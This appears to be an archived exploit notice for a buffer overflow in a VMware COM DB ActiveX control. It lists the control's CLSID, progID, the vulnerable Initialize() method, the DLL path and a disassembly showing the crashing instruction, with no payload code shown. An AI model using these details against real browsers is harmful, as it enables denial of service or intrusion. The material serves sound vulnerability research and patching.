VMware COM DB ActiveX Remote Buffer Overflow Exploit

2009-01-0900:00:00

vulners.com

JSON

<html>
<!–
<< Bug discovered by cN4phux >> a small GHH from DZ.

VMware COM DB ActiveX Remote Buffer Overflow Exploit

This was written for educational purpose. Use it at your own risk.

Author will be not responsible for any damage.

Tested on Windows XP Professional SP2, with Internet Explorer 6.x.x

CLSID = '8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA'
progID = "VMDBCOMLib.VMList"
member_name = "Initialize"
Target_File = "C:\Program Files\VMware\VMware Server\vmdbCOM.dll"

Function that is vulnerable with a DOS IE . . Initialize()

Block Disassembly:

111AE667 RETN
111AE668 MOV EAX,[EBP+C]
111AE66B PUSH EBX
111AE66C PUSH EDI
111AE66D PUSH EAX
111AE66E MOV [ESI+4],EAX
111AE671 CALL [EAX]   &lt;-------------------- it will be crash here . . .&lt;
111AE673 MOV EBX,[EBP+8]
111AE676 PUSH 1133D9D0
111AE67B PUSH EBX
111AE67C CALL 111AF800
111AE681 MOV EDI,EAX
111AE683 ADD ESP,C
111AE686 TEST EDI,EDI
111AE688 JL 111AE731

Exception Code: ACCESS_VIOLATION
Disasm: 111AE671 CALL [EAX] (vmapplib.DLL)

Greetz to friend's : Blub, Zigma, Heurs, djug & etc . . .

–>

JSON